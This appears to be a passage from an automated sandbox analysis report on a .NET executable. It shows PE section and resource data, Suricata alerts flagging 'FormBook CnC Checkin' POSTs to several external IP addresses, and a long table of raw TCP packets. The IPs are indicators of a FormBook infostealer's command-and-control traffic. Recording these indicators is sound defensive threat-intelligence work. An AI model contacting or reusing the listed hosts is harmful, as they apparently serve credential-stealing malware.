                                                                        .reloc0xe20000xc0x200a3df6e9d0fbf2b5699259f4a06b99c1fFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                        Resources

                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                        RT_ICON0xdc1000x531aPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.968083106138949
                                                                        RT_GROUP_ICON0xe142c0x14data1.05
                                                                        RT_VERSION0xe14500x3a0data0.41810344827586204
                                                                        RT_MANIFEST0xe18000x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                        Imports

                                                                        DLLImport
                                                                        mscoree.dll_CorExeMain

                                                                        Network Behavior

                                                                        Suricata IDS Alerts

                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                        2024-11-28T09:14:09.542330+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549809162.0.215.3380TCP
                                                                        2024-11-28T09:14:12.420519+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549818162.0.215.3380TCP
                                                                        2024-11-28T09:14:14.958104+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549825162.0.215.3380TCP
                                                                        2024-11-28T09:14:24.466710+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549847104.18.73.11680TCP
                                                                        2024-11-28T09:14:27.132228+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549852104.18.73.11680TCP
                                                                        2024-11-28T09:14:29.852129+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549859104.18.73.11680TCP
                                                                        2024-11-28T09:14:39.904886+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549882192.185.147.10080TCP
                                                                        2024-11-28T09:14:42.540436+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549888192.185.147.10080TCP
                                                                        2024-11-28T09:14:45.186578+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549894192.185.147.10080TCP
                                                                        2024-11-28T09:14:54.482114+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54991713.248.169.4880TCP
                                                                        2024-11-28T09:14:57.153122+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54992413.248.169.4880TCP
                                                                        2024-11-28T09:14:59.864734+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54993013.248.169.4880TCP
                                                                        2024-11-28T09:15:09.062744+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5499523.33.130.19080TCP
                                                                        2024-11-28T09:15:11.765225+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5499593.33.130.19080TCP
                                                                        2024-11-28T09:15:14.795351+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5499653.33.130.19080TCP
                                                                        2024-11-28T09:15:23.873450+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549984172.67.222.6980TCP
                                                                        2024-11-28T09:15:26.488292+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549991172.67.222.6980TCP
                                                                        2024-11-28T09:15:29.245975+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549999172.67.222.6980TCP
                                                                        2024-11-28T09:15:39.491584+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550007103.249.106.9180TCP
                                                                        2024-11-28T09:15:42.170839+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550008103.249.106.9180TCP
                                                                        2024-11-28T09:15:44.842297+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550009103.249.106.9180TCP
                                                                        2024-11-28T09:15:55.805631+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550011121.43.155.3580TCP
                                                                        2024-11-28T09:15:58.512412+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550012121.43.155.3580TCP
                                                                        2024-11-28T09:16:01.158695+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550013121.43.155.3580TCP
                                                                        2024-11-28T09:16:11.036905+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550015199.192.23.12380TCP
                                                                        2024-11-28T09:16:13.717053+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550016199.192.23.12380TCP
                                                                        2024-11-28T09:16:16.456673+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550017199.192.23.12380TCP
                                                                        2024-11-28T09:16:26.085634+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55001952.60.87.16380TCP
                                                                        2024-11-28T09:16:28.752419+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55002052.60.87.16380TCP
                                                                        2024-11-28T09:16:31.380140+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55002152.60.87.16380TCP
                                                                        2024-11-28T09:16:41.545133+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550023161.97.142.14480TCP
                                                                        2024-11-28T09:16:43.984151+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550024161.97.142.14480TCP
                                                                        2024-11-28T09:16:46.603798+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550025161.97.142.14480TCP
                                                                        2024-11-28T09:16:56.364697+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55002775.2.103.2380TCP
                                                                        2024-11-28T09:16:58.982905+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55002875.2.103.2380TCP
                                                                        2024-11-28T09:17:01.737260+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55002975.2.103.2380TCP
                                                                        2024-11-28T09:17:11.556796+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55003113.248.169.4880TCP
                                                                        2024-11-28T09:17:14.660402+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55003213.248.169.4880TCP

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Nov 28, 2024 09:13:50.727847099 CET4977280192.168.2.5185.106.208.3
                                                                        Nov 28, 2024 09:13:50.847739935 CET8049772185.106.208.3192.168.2.5
                                                                        Nov 28, 2024 09:13:50.847820044 CET4977280192.168.2.5185.106.208.3
                                                                        Nov 28, 2024 09:13:50.858181953 CET4977280192.168.2.5185.106.208.3
                                                                        Nov 28, 2024 09:13:50.978198051 CET8049772185.106.208.3192.168.2.5
                                                                        Nov 28, 2024 09:13:52.244767904 CET8049772185.106.208.3192.168.2.5
                                                                        Nov 28, 2024 09:13:52.244832039 CET8049772185.106.208.3192.168.2.5
                                                                        Nov 28, 2024 09:13:52.245060921 CET4977280192.168.2.5185.106.208.3
                                                                        Nov 28, 2024 09:13:52.249573946 CET4977280192.168.2.5185.106.208.3
                                                                        Nov 28, 2024 09:13:52.371844053 CET8049772185.106.208.3192.168.2.5
                                                                        Nov 28, 2024 09:14:08.103112936 CET4980980192.168.2.5162.0.215.33
                                                                        Nov 28, 2024 09:14:08.223329067 CET8049809162.0.215.33192.168.2.5
                                                                        Nov 28, 2024 09:14:08.223484039 CET4980980192.168.2.5162.0.215.33
                                                                        Nov 28, 2024 09:14:08.244015932 CET4980980192.168.2.5162.0.215.33
                                                                        Nov 28, 2024 09:14:08.364685059 CET8049809162.0.215.33192.168.2.5
                                                                        Nov 28, 2024 09:14:09.541932106 CET8049809162.0.215.33192.168.2.5
                                                                        Nov 28, 2024 09:14:09.542239904 CET8049809162.0.215.33192.168.2.5
                                                                        Nov 28, 2024 09:14:09.542253017 CET8049809162.0.215.33192.168.2.5
                                                                        Nov 28, 2024 09:14:09.542330027 CET4980980192.168.2.5162.0.215.33
                                                                        Nov 28, 2024 09:14:09.543045998 CET8049809162.0.215.33192.168.2.5
                                                                        Nov 28, 2024 09:14:09.543092966 CET4980980192.168.2.5162.0.215.33
                                                                        Nov 28, 2024 09:14:09.551956892 CET8049809162.0.215.33192.168.2.5
                                                                        Nov 28, 2024 09:14:09.552036047 CET8049809162.0.215.33192.168.2.5
                                                                        Nov 28, 2024 09:14:09.552126884 CET4980980192.168.2.5162.0.215.33
                                                                        Nov 28, 2024 09:14:09.748383045 CET4980980192.168.2.5162.0.215.33
                                                                        Nov 28, 2024 09:14:10.768472910 CET4981880192.168.2.5162.0.215.33
                                                                        Nov 28, 2024 09:14:10.888534069 CET8049818162.0.215.33192.168.2.5
                                                                        Nov 28, 2024 09:14:10.888874054 CET4981880192.168.2.5162.0.215.33
                                                                        Nov 28, 2024 09:14:10.903834105 CET4981880192.168.2.5162.0.215.33
                                                                        Nov 28, 2024 09:14:11.023822069 CET8049818162.0.215.33192.168.2.5
                                                                        Nov 28, 2024 09:14:12.420519114 CET4981880192.168.2.5162.0.215.33
                                                                        Nov 28, 2024 09:14:12.421308994 CET8049818162.0.215.33192.168.2.5
                                                                        Nov 28, 2024 09:14:12.421329975 CET8049818162.0.215.33192.168.2.5
                                                                        Nov 28, 2024 09:14:12.421475887 CET4981880192.168.2.5162.0.215.33
                                                                        Nov 28, 2024 09:14:12.422353983 CET8049818162.0.215.33192.168.2.5
                                                                        Nov 28, 2024 09:14:12.422369957 CET8049818162.0.215.33192.168.2.5
                                                                        Nov 28, 2024 09:14:12.422383070 CET8049818162.0.215.33192.168.2.5
                                                                        Nov 28, 2024 09:14:12.422396898 CET8049818162.0.215.33192.168.2.5
                                                                        Nov 28, 2024 09:14:12.422414064 CET4981880192.168.2.5162.0.215.33
                                                                        Nov 28, 2024 09:14:12.422468901 CET4981880192.168.2.5162.0.215.33
                                                                        Nov 28, 2024 09:14:12.422468901 CET4981880192.168.2.5162.0.215.33
                                                                        Nov 28, 2024 09:14:12.422468901 CET4981880192.168.2.5162.0.215.33
                                                                        Nov 28, 2024 09:14:12.499279976 CET8049818162.0.215.33192.168.2.5
                                                                        Nov 28, 2024 09:14:12.499438047 CET4981880192.168.2.5162.0.215.33
                                                                        Nov 28, 2024 09:14:12.540606976 CET8049818162.0.215.33192.168.2.5
                                                                        Nov 28, 2024 09:14:12.540715933 CET4981880192.168.2.5162.0.215.33
                                                                        Nov 28, 2024 09:14:13.439097881 CET4982580192.168.2.5162.0.215.33
                                                                        Nov 28, 2024 09:14:13.558995008 CET8049825162.0.215.33192.168.2.5
                                                                        Nov 28, 2024 09:14:13.559087038 CET4982580192.168.2.5162.0.215.33
                                                                        Nov 28, 2024 09:14:13.574978113 CET4982580192.168.2.5162.0.215.33
                                                                        Nov 28, 2024 09:14:13.695228100 CET8049825162.0.215.33192.168.2.5
                                                                        Nov 28, 2024 09:14:13.695244074 CET8049825162.0.215.33192.168.2.5
                                                                        Nov 28, 2024 09:14:14.957858086 CET8049825162.0.215.33192.168.2.5
                                                                        Nov 28, 2024 09:14:14.958009005 CET8049825162.0.215.33192.168.2.5
                                                                        Nov 28, 2024 09:14:14.958020926 CET8049825162.0.215.33192.168.2.5
                                                                        Nov 28, 2024 09:14:14.958103895 CET4982580192.168.2.5162.0.215.33
                                                                        Nov 28, 2024 09:14:14.958543062 CET8049825162.0.215.33192.168.2.5
                                                                        Nov 28, 2024 09:14:14.958558083 CET8049825162.0.215.33192.168.2.5
                                                                        Nov 28, 2024 09:14:14.958623886 CET4982580192.168.2.5162.0.215.33
                                                                        Nov 28, 2024 09:14:14.959247112 CET8049825162.0.215.33192.168.2.5
                                                                        Nov 28, 2024 09:14:14.959296942 CET4982580192.168.2.5162.0.215.33
                                                                        Nov 28, 2024 09:14:15.076626062 CET4982580192.168.2.5162.0.215.33
                                                                        Nov 28, 2024 09:14:16.095196962 CET4983180192.168.2.5162.0.215.33
                                                                        Nov 28, 2024 09:14:16.215231895 CET8049831162.0.215.33192.168.2.5
                                                                        Nov 28, 2024 09:14:16.215325117 CET4983180192.168.2.5162.0.215.33
                                                                        Nov 28, 2024 09:14:16.226296902 CET4983180192.168.2.5162.0.215.33
                                                                        Nov 28, 2024 09:14:16.346491098 CET8049831162.0.215.33192.168.2.5
                                                                        Nov 28, 2024 09:14:17.485291958 CET8049831162.0.215.33192.168.2.5
                                                                        Nov 28, 2024 09:14:17.485467911 CET8049831162.0.215.33192.168.2.5
                                                                        Nov 28, 2024 09:14:17.485481977 CET8049831162.0.215.33192.168.2.5
                                                                        Nov 28, 2024 09:14:17.485614061 CET4983180192.168.2.5162.0.215.33
                                                                        Nov 28, 2024 09:14:17.486135006 CET8049831162.0.215.33192.168.2.5
                                                                        Nov 28, 2024 09:14:17.486148119 CET8049831162.0.215.33192.168.2.5
                                                                        Nov 28, 2024 09:14:17.486196041 CET4983180192.168.2.5162.0.215.33
                                                                        Nov 28, 2024 09:14:17.486938953 CET8049831162.0.215.33192.168.2.5
                                                                        Nov 28, 2024 09:14:17.486984015 CET8049831162.0.215.33192.168.2.5
                                                                        Nov 28, 2024 09:14:17.486990929 CET4983180192.168.2.5162.0.215.33
                                                                        Nov 28, 2024 09:14:17.487986088 CET8049831162.0.215.33192.168.2.5
                                                                        Nov 28, 2024 09:14:17.488001108 CET8049831162.0.215.33192.168.2.5
                                                                        Nov 28, 2024 09:14:17.488014936 CET8049831162.0.215.33192.168.2.5
                                                                        Nov 28, 2024 09:14:17.488039970 CET4983180192.168.2.5162.0.215.33
                                                                        Nov 28, 2024 09:14:17.488060951 CET4983180192.168.2.5162.0.215.33
                                                                        Nov 28, 2024 09:14:17.492013931 CET4983180192.168.2.5162.0.215.33
                                                                        Nov 28, 2024 09:14:17.612288952 CET8049831162.0.215.33192.168.2.5
                                                                        Nov 28, 2024 09:14:23.012341976 CET4984780192.168.2.5104.18.73.116
                                                                        Nov 28, 2024 09:14:23.238071918 CET8049847104.18.73.116192.168.2.5
                                                                        Nov 28, 2024 09:14:23.238234043 CET4984780192.168.2.5104.18.73.116
                                                                        Nov 28, 2024 09:14:23.252281904 CET4984780192.168.2.5104.18.73.116
                                                                        Nov 28, 2024 09:14:23.473834038 CET8049847104.18.73.116192.168.2.5
                                                                        Nov 28, 2024 09:14:24.466510057 CET8049847104.18.73.116192.168.2.5
                                                                        Nov 28, 2024 09:14:24.466612101 CET8049847104.18.73.116192.168.2.5
                                                                        Nov 28, 2024 09:14:24.466710091 CET4984780192.168.2.5104.18.73.116
                                                                        Nov 28, 2024 09:14:24.764058113 CET4984780192.168.2.5104.18.73.116
                                                                        Nov 28, 2024 09:14:25.784291983 CET4985280192.168.2.5104.18.73.116
                                                                        Nov 28, 2024 09:14:25.904220104 CET8049852104.18.73.116192.168.2.5
                                                                        Nov 28, 2024 09:14:25.904412985 CET4985280192.168.2.5104.18.73.116
                                                                        Nov 28, 2024 09:14:25.920182943 CET4985280192.168.2.5104.18.73.116
                                                                        Nov 28, 2024 09:14:26.040667057 CET8049852104.18.73.116192.168.2.5
                                                                        Nov 28, 2024 09:14:27.131989002 CET8049852104.18.73.116192.168.2.5
                                                                        Nov 28, 2024 09:14:27.132174969 CET8049852104.18.73.116192.168.2.5
                                                                        Nov 28, 2024 09:14:27.132227898 CET4985280192.168.2.5104.18.73.116
                                                                        Nov 28, 2024 09:14:27.435879946 CET4985280192.168.2.5104.18.73.116
                                                                        Nov 28, 2024 09:14:28.455586910 CET4985980192.168.2.5104.18.73.116
                                                                        Nov 28, 2024 09:14:28.575437069 CET8049859104.18.73.116192.168.2.5
                                                                        Nov 28, 2024 09:14:28.575656891 CET4985980192.168.2.5104.18.73.116
                                                                        Nov 28, 2024 09:14:28.590991020 CET4985980192.168.2.5104.18.73.116
                                                                        Nov 28, 2024 09:14:28.710995913 CET8049859104.18.73.116192.168.2.5
                                                                        Nov 28, 2024 09:14:28.711028099 CET8049859104.18.73.116192.168.2.5
                                                                        Nov 28, 2024 09:14:29.851568937 CET8049859104.18.73.116192.168.2.5
                                                                        Nov 28, 2024 09:14:29.852057934 CET8049859104.18.73.116192.168.2.5
                                                                        Nov 28, 2024 09:14:29.852128983 CET4985980192.168.2.5104.18.73.116
                                                                        Nov 28, 2024 09:14:30.092247009 CET4985980192.168.2.5104.18.73.116
                                                                        Nov 28, 2024 09:14:31.110868931 CET4986680192.168.2.5104.18.73.116
                                                                        Nov 28, 2024 09:14:31.230859041 CET8049866104.18.73.116192.168.2.5
                                                                        Nov 28, 2024 09:14:31.231010914 CET4986680192.168.2.5104.18.73.116
                                                                        Nov 28, 2024 09:14:31.239773035 CET4986680192.168.2.5104.18.73.116
                                                                        Nov 28, 2024 09:14:31.359707117 CET8049866104.18.73.116192.168.2.5
                                                                        Nov 28, 2024 09:14:32.413784027 CET8049866104.18.73.116192.168.2.5
                                                                        Nov 28, 2024 09:14:32.413949013 CET8049866104.18.73.116192.168.2.5
                                                                        Nov 28, 2024 09:14:32.414043903 CET4986680192.168.2.5104.18.73.116
                                                                        Nov 28, 2024 09:14:32.416944027 CET4986680192.168.2.5104.18.73.116
                                                                        Nov 28, 2024 09:14:32.536914110 CET8049866104.18.73.116192.168.2.5
                                                                        Nov 28, 2024 09:14:38.263391018 CET4988280192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:38.383388042 CET8049882192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:38.383589983 CET4988280192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:38.398060083 CET4988280192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:38.518027067 CET8049882192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:39.904886007 CET4988280192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:39.920085907 CET8049882192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:39.920264959 CET4988280192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:39.920327902 CET8049882192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:39.920341969 CET8049882192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:39.920378923 CET4988280192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:39.920403957 CET4988280192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:39.921283007 CET8049882192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:39.921294928 CET8049882192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:39.921324015 CET4988280192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:39.921336889 CET4988280192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:39.922418118 CET8049882192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:39.922430038 CET8049882192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:39.922458887 CET4988280192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:39.922472000 CET4988280192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:39.923332930 CET8049882192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:39.923345089 CET8049882192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:39.923392057 CET4988280192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:39.924310923 CET8049882192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:39.924359083 CET4988280192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:40.923702002 CET4988880192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:41.043865919 CET8049888192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:41.043976068 CET4988880192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:41.058192015 CET4988880192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:41.178227901 CET8049888192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:42.540067911 CET8049888192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:42.540267944 CET8049888192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:42.540281057 CET8049888192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:42.540436029 CET4988880192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:42.541014910 CET8049888192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:42.541028023 CET8049888192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:42.541070938 CET4988880192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:42.541826010 CET8049888192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:42.541838884 CET8049888192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:42.541874886 CET4988880192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:42.542694092 CET8049888192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:42.542706966 CET8049888192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:42.542717934 CET8049888192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:42.542742968 CET4988880192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:42.542759895 CET4988880192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:42.561001062 CET4988880192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:42.660480976 CET8049888192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:42.660612106 CET8049888192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:42.660664082 CET4988880192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:42.664664030 CET4988880192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:43.626600027 CET4989480192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:43.746576071 CET8049894192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:43.748912096 CET4989480192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:43.855289936 CET4989480192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:43.975274086 CET8049894192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:43.975351095 CET8049894192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:45.186304092 CET8049894192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:45.186531067 CET8049894192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:45.186543941 CET8049894192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:45.186578035 CET4989480192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:45.187294960 CET8049894192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:45.187308073 CET8049894192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:45.187342882 CET4989480192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:45.188066959 CET8049894192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:45.188105106 CET4989480192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:45.188108921 CET8049894192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:45.188981056 CET8049894192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:45.188992977 CET8049894192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:45.189047098 CET4989480192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:45.189646959 CET8049894192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:45.189702988 CET4989480192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:45.307002068 CET8049894192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:45.307147026 CET8049894192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:45.307197094 CET4989480192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:45.357852936 CET4989480192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:45.378256083 CET8049894192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:45.378309011 CET4989480192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:45.378437996 CET8049894192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:45.378508091 CET4989480192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:45.382643938 CET8049894192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:45.382688999 CET4989480192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:45.382833958 CET8049894192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:45.382877111 CET4989480192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:45.391057968 CET8049894192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:45.391114950 CET4989480192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:45.391267061 CET8049894192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:45.391319990 CET4989480192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:45.396764040 CET8049894192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:45.396807909 CET4989480192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:46.433916092 CET4990080192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:46.553932905 CET8049900192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:46.554014921 CET4990080192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:46.649779081 CET4990080192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:46.769723892 CET8049900192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:47.789602995 CET8049900192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:47.789736986 CET8049900192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:47.796698093 CET4990080192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:47.796698093 CET4990080192.168.2.5192.185.147.100
                                                                        Nov 28, 2024 09:14:47.916702986 CET8049900192.185.147.100192.168.2.5
                                                                        Nov 28, 2024 09:14:53.216738939 CET4991780192.168.2.513.248.169.48
                                                                        Nov 28, 2024 09:14:53.336685896 CET804991713.248.169.48192.168.2.5
                                                                        Nov 28, 2024 09:14:53.336776018 CET4991780192.168.2.513.248.169.48
                                                                        Nov 28, 2024 09:14:53.351852894 CET4991780192.168.2.513.248.169.48
                                                                        Nov 28, 2024 09:14:53.472069025 CET804991713.248.169.48192.168.2.5
                                                                        Nov 28, 2024 09:14:54.482003927 CET804991713.248.169.48192.168.2.5
                                                                        Nov 28, 2024 09:14:54.482114077 CET4991780192.168.2.513.248.169.48
                                                                        Nov 28, 2024 09:14:54.858167887 CET4991780192.168.2.513.248.169.48
                                                                        Nov 28, 2024 09:14:54.978060961 CET804991713.248.169.48192.168.2.5
                                                                        Nov 28, 2024 09:14:55.878699064 CET4992480192.168.2.513.248.169.48
                                                                        Nov 28, 2024 09:14:55.998743057 CET804992413.248.169.48192.168.2.5
                                                                        Nov 28, 2024 09:14:55.999212027 CET4992480192.168.2.513.248.169.48
                                                                        Nov 28, 2024 09:14:56.013505936 CET4992480192.168.2.513.248.169.48
                                                                        Nov 28, 2024 09:14:56.133533001 CET804992413.248.169.48192.168.2.5
                                                                        Nov 28, 2024 09:14:57.153053045 CET804992413.248.169.48192.168.2.5
                                                                        Nov 28, 2024 09:14:57.153121948 CET4992480192.168.2.513.248.169.48
                                                                        Nov 28, 2024 09:14:57.529612064 CET4992480192.168.2.513.248.169.48
                                                                        Nov 28, 2024 09:14:57.649643898 CET804992413.248.169.48192.168.2.5
                                                                        Nov 28, 2024 09:14:58.548533916 CET4993080192.168.2.513.248.169.48
                                                                        Nov 28, 2024 09:14:58.668549061 CET804993013.248.169.48192.168.2.5
                                                                        Nov 28, 2024 09:14:58.668651104 CET4993080192.168.2.513.248.169.48
                                                                        Nov 28, 2024 09:14:58.689878941 CET4993080192.168.2.513.248.169.48
                                                                        Nov 28, 2024 09:14:58.809887886 CET804993013.248.169.48192.168.2.5
                                                                        Nov 28, 2024 09:14:58.809994936 CET804993013.248.169.48192.168.2.5
                                                                        Nov 28, 2024 09:14:59.860920906 CET804993013.248.169.48192.168.2.5
                                                                        Nov 28, 2024 09:14:59.864733934 CET4993080192.168.2.513.248.169.48
                                                                        Nov 28, 2024 09:15:00.201436996 CET4993080192.168.2.513.248.169.48
                                                                        Nov 28, 2024 09:15:00.321719885 CET804993013.248.169.48192.168.2.5
                                                                        Nov 28, 2024 09:15:01.222023010 CET4993780192.168.2.513.248.169.48
                                                                        Nov 28, 2024 09:15:01.342303038 CET804993713.248.169.48192.168.2.5
                                                                        Nov 28, 2024 09:15:01.342395067 CET4993780192.168.2.513.248.169.48
                                                                        Nov 28, 2024 09:15:01.353698969 CET4993780192.168.2.513.248.169.48
                                                                        Nov 28, 2024 09:15:01.473712921 CET804993713.248.169.48192.168.2.5
                                                                        Nov 28, 2024 09:15:02.459662914 CET804993713.248.169.48192.168.2.5
                                                                        Nov 28, 2024 09:15:02.459670067 CET804993713.248.169.48192.168.2.5
                                                                        Nov 28, 2024 09:15:02.459849119 CET4993780192.168.2.513.248.169.48
                                                                        Nov 28, 2024 09:15:02.462517977 CET4993780192.168.2.513.248.169.48
                                                                        Nov 28, 2024 09:15:02.582473993 CET804993713.248.169.48192.168.2.5
                                                                        Nov 28, 2024 09:15:07.793289900 CET4995280192.168.2.53.33.130.190
                                                                        Nov 28, 2024 09:15:07.919365883 CET80499523.33.130.190192.168.2.5
